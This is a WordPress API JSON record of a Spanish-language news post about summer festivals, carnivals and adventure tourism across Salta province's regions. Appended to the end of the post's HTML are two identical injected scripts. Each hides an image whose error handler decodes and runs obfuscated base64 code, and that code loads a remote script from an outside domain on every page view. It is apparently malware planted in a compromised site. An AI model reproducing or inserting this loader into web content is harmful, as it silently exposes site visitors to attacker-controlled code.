{"id":2056,"date":"2023-01-08T22:43:23","date_gmt":"2023-01-09T01:43:23","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2056"},"modified":"2025-08-14T00:25:57","modified_gmt":"2025-08-14T03:25:57","slug":"el-verano-en-salta-se-vive-a-pleno-con-actividades-culturales-de-aventura-y-gastronomia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2056","title":{"rendered":"El verano en Salta se vive a pleno con actividades culturales, de aventura y gastronom\u00eda"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#920427\"><em>Los municipios salte\u00f1os organizaron para enero y febrero actividades que resaltan la gastronom\u00eda y la cultura, fusionadas con alternativas de turismo aventura. Para mayor informaci\u00f3n consultar en https:\/\/www.saltacalendario.gob.ar\/<\/em><\/h4>\n\n\n\n<p>La aventura y la naturaleza se disfrutan en enero en diferentes lugares de la provincia con un sinf\u00edn de opciones para vivirlas en familia, en pareja o con amigos en las opciones que en los diferentes municipios se organizaron para el verano y que pueden ser consultadas en&nbsp;<a href=\"http:\/\/www.saltacalendario.gob.ar%20.\/\">http:\/\/www.saltacalendario.gob.ar<\/a><\/p>\n\n\n\n<p>\u00abSalta, una receta que no falla\u00bb es la campa\u00f1a de verano donde un poco de cabalgata, otro m\u00e1s de deportes n\u00e1uticos, o recorrer en bicis los circuitos en las siete regiones tur\u00edsticas. Salta es aventura, naturaleza y la mejor cultura del pa\u00eds.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5412-el-verano-en-salta-se-vive-a-pleno-con-actividades-culturales-de-aventura-y-gastronomia.jpg\" alt=\"\" width=\"285\" height=\"188\"\/><\/figure><\/div>\n\n\n<p>La propuesta de verano con casi 400 actividades incluye ferias artesanales y gastron\u00f3micas, cabalgatas a la luz de la luna, caminatas por las yungas y por la selva; festivales musicales y bailes populares; los deportes n\u00e1uticos para todos los gustos en distintos niveles de dificultad aseguran la aventura. Avanzado el verano las ceremonias de desentierro y entierro del carnaval invitan a disfrutar de Salta con albahaca en el pelo.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5413-el-verano-en-salta-se-vive-a-pleno-con-actividades-culturales-de-aventura-y-gastronomia.jpg\" alt=\"\" width=\"281\" height=\"184\"\/><\/figure><\/div>\n\n\n<p>Ciudad de Salta y Destinos Cercanos y sus Parques Urbanos, la Ciudad de Navidad. A pocos km, en La Caldera saborear la chicha es su importante festival espera con su pesebre viviente y su tradicional. San Lorenzo y la aventura en la reserva Las Yungas, sumado a sus festivales y en Vaqueros disfrutar las estrellas en el Planetario Amauta.<\/p>\n\n\n\n<p>Valle de Lerma y sus tradicionales corsos y de sus fiestas carnestolendas, en Campo Quijano se puede participar del encuentro de brujos y copleras, de comadres y compadres. Imperdible Chicoana con el concurso del asador y el encuentro de bandoneoneros y copleros. En Coronel Moldes hay ferias y festivales y las actividades recreativas y deportivas en el dique Cabra Corral. Llegar a El Carril a saborear las empanadas de su X concurso, disfrutar de la semana de la cerveza y la pizza o el concurso de la cabeza guateada<\/p>\n\n\n\n<p>Conocer la historia es una de las propuestas de Guachipas con su excursi\u00f3n a las Cuevas pintadas y las ferias artesanales, folcl\u00f3ricas y gastron\u00f3micas. La Vi\u00f1a ofrece el Festival del Tabaco, los corsos vi\u00f1ateros y el vig\u00e9simo Festival del humor y el canto. Rosario de Lerma propone un viaje en tren a Campo Quijano, el concurso del tamal y bicicleteadas. Cerrillos 116 edici\u00f3n del corso de las flores y la Caravana del carnaval.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5414-el-verano-en-salta-se-vive-a-pleno-con-actividades-culturales-de-aventura-y-gastronomia.jpg\" alt=\"\" width=\"339\" height=\"224\"\/><\/figure><\/div>\n\n\n<p>Valles Calchaqu\u00edes: numerosos festivales y vendimias. En Animan\u00e1 la feria del puente San Antonio entre otras actividades; en Cachi el Festival del Vino de Altura y el Encuentro de asadoras. Visitar Cafayate y vivir su c\u00e9lebre Serenata o participar de la Fiesta del vino artesanal. En La Poma, espera el XXIV Festival de la trucha y su festival folcl\u00f3rico. En Cachi el 13 y 14 se espera a visitantes para el Festival de la Tradici\u00f3n Calchaqu\u00ed.<\/p>\n\n\n\n<p>La fiesta Regional del Tomate en Payogasta y el Concurso del queso de cabra. En San Carlos se puede disfrutar el dise\u00f1o en su desfile de ropa artesanal y la 42 Feria Artesanal de los Valles Calchaqu\u00edes; Seclant\u00e1s recibi\u00f3 este fin de semana a turistas con el Festival El Seclante\u00f1o y Barrac\u00e1n.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5415-el-verano-en-salta-se-vive-a-pleno-con-actividades-culturales-de-aventura-y-gastronomia.jpg\" alt=\"\" width=\"281\" height=\"186\"\/><\/figure><\/div>\n\n\n<p>Selva de Monta\u00f1a: salidas al salto de agua El Espejo en Aguaray. Saborear empanadas en el Concurso de Gral. Ballivi\u00e1n. \u00a0Amores y sabores de Vespucio y el festival de la Aloja esperan en Gral. Mosconi as\u00ed como la diversi\u00f3n de los corsos en Hip\u00f3lito Yrigoyen. El Festival de reggaet\u00f3n y un desfile son las propuestas de Pichanal. San Ram\u00f3n de la Nueva Or\u00e1n propone un parque tem\u00e1tico y el festival musical y gastron\u00f3mico 20 de Febrero. Por su parte, una aventura en las yungas, la Serenata del Amor son algunas de las propuestas de Tartagal.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5416-el-verano-en-salta-se-vive-a-pleno-con-actividades-culturales-de-aventura-y-gastronomia.jpg\" alt=\"\" width=\"245\" height=\"162\"\/><\/figure><\/div>\n\n\n<p><strong>La Puna de los Andes<\/strong>: San Antonio de los Cobres ofrece su Feria ancestral de los pueblos originarios y el 2do Encuentro de Cultura de la Puna, tambi\u00e9n se puede visitar el Museo Andino. En Tolar Grande se realiza el carnaval andino tolare\u00f1o y un Encuentro de copleros.<\/p>\n\n\n\n<p>Quebradas Andinas: en Iruya, cabalgatas, caminatas y circuitos en veh\u00edculos 4&#215;4 en la bella inmensidad de la quebrada. El Valle Hist\u00f3rico y Gaucho donde en Apolinario Saravia, Campo Santo, El Bordo se disfrutar\u00e1n festivales musicales, ferias artesanales. En El Galp\u00f3n la IV edici\u00f3n del Festival del Juramento a orillas del r\u00edo Piedras y la Feria de la Cerveza Artesanal. Gral G\u00fcemes propone su Festival la Patria vive en G\u00fcemes.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5417-el-verano-en-salta-se-vive-a-pleno-con-actividades-culturales-de-aventura-y-gastronomia.jpg\" alt=\"\" width=\"271\" height=\"179\"\/><\/figure><\/div>\n\n\n<p>En Gral. Pizarro y La Candelaria, festivales de m\u00fasica y ferias gastron\u00f3micas son propuestas para toda la familia. Rosario de la frontera con su temporada del parque acu\u00e1tico y el importante Festival de la Chaya y Sol del verano. San Jos\u00e9 invita al Festimiel y a caminatas Cerro de la medialuna y cabalgatas hacia la Posta de Yatasto<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El verano en Salta se vive a pleno con actividades culturales, de aventura y gastronom\u00eda\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/d5DcZqY7qfo?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-verano-en-salta-se-vive-a-pleno-con-actividades-culturales-de-aventura-y-gastronomia-87200\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los municipios salte\u00f1os organizaron para enero y febrero actividades que resaltan la gastronom\u00eda y la cultura, fusionadas con alternativas de turismo aventura. Para mayor informaci\u00f3n consultar en https:\/\/www.saltacalendario.gob.ar\/ La aventura y la naturaleza se disfrutan en enero en diferentes lugares de la provincia con un sinf\u00edn de opciones para vivirlas en familia, en pareja o [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2057,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-2056","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2056"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2056"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2056\/revisions"}],"predecessor-version":[{"id":7214,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2056\/revisions\/7214"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2057"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2056"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2056"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2056"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}